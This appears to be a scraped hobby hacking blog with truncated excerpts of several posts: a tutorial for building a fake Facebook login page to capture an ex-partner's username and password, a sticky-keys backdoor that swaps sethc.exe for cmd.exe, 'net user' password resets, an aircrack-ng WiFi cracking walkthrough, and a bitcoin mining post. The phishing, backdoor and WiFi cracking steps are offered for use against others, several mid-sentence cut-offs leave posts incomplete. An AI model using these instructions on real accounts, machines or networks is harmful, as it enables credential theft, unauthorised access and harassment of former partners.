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Lets hack the freaking facebook

Hack i mean peak ....but i can still get yours ex username and password .... what else you need ? for now ? Hackers way in .. thats how facebook gets most of the employees to make this work lets make a Trojan add like free pizza and your ex clicked it and then it redirected to a custom form just like a facebook login form (login with facebook) and your idiot ex fill up the form boom you got her user name and password win win let me put the code that you could you to make that login page and store the data onto a database hope you guys know how to deal with php and its data base connection a bit... soo im gonna put the form code here and you can use a data base to connect it and use the post data your convince and my ease <html> <head> <style> .login-form-wrap {   background: #5170ad;   background: -moz-radial-gradient(center, ellipse cover, #5170ad 0%, #355493 100%);   background: -webkit-gradient(radial, center center, 0px,
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Build Your On Virtual Assistant with AIML And Python

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How to reset the windows password with any linux

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No startup drama lets get to the base quickly ..... Remember the stick key that pop up when you accentually tap on the shift key five time ?? .. well thats our way in.......... So lets make a way in We are going to do this just with the CMD no old boring GUI copy past... open the cmd and follow the step's   (replace "c:" with the correct drive letter if Windows is not located on C:): copy c:\windows\system32\sethc.exe c:\ This creates a copy of sethc.exe to restore later. Type this command to replace sethc.exe with cmd.exe: copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe Reboot your computer and start the Windows installation where you forgot the administrator password. After you see the logon screen, press the SHIFT key five times. You should see a command prompt  Now we done with the back door!!!! follow the link where i explained how to reset the windows pass word with cmd its kind of easy so follow it n


Aright the word hacking in the title is kind of funny to me and to you ( PROBABLY ) And this blog will have a follow up to do the real cool stuff about windows password... like the wifi hack this not a big deal . first step  open up the command prompt as administrative mode.....    second step type net user this will show all the users and pick one name you need to mess up the password step three net user username * note *fill up the user name from the net user command  hit enter this  will ask you the new password type in one or leave it blank and hit enter do the same in confirm : you are good to go .... the password is hack (lol) so in next blog we are gonna make a back door . and we can do this same with out even login to the system :)

how to get the wifi password in linux

this a easy one . So iam not gonna describe  the whole thing jsut follow the steps thats all. Lets gets to it :) first you need some free tools . if you are using a kali linux distro you already have it in case you dont follow this commands one by one sudo apt-get install airmon-ng  sudo apt-get install airodump-ng sudo apt-get install aireplay-ng sudo apt-get install aircrack-ng  downlod this wordlist and after this these we pretty much get everything we need next step type in ifconfig it will show the available device pick one in mind it will looks like wlan1 wlan0 something like that  and iam gonna pick wlan0 next type in airmon-ng wlan0 start  thats will start our wlan0 as monitor mode and show some process kill them all with kill pid then type in airodump-ng wlan0mon  this will show all the available network pick the network and copy the essid,channel and bssi

Making money on-line ? try bit-coin mining

Explaining cryptocurrency mining like Bitcoin you have a system useing it every 24/7 . and you wanna make some money out of it with out those terrible methods you found on the web . i have a better one . if you dont wanna type share prompt thing like  this the blog. Give it   CRYPTOMINING. you are mining for bit coin or lite coin this are digital currency that have real life value . such as a single bit coin worth 2554 us dollar at the time of this can easily use this to buy games on steam or other translations . but some country's(Japan)consider this as a illegal. so down to the real question how do you get this coins with out stretching your back .it is not that hard .you need a good system with a respectable GPU , a wallet , a mining program. for a wallet shoot-out to coin base i leave a link below (not hard and newbi friendly )     for mining program there a lot and i have one so you can try out . its call nice hash.likes are down there  all you have t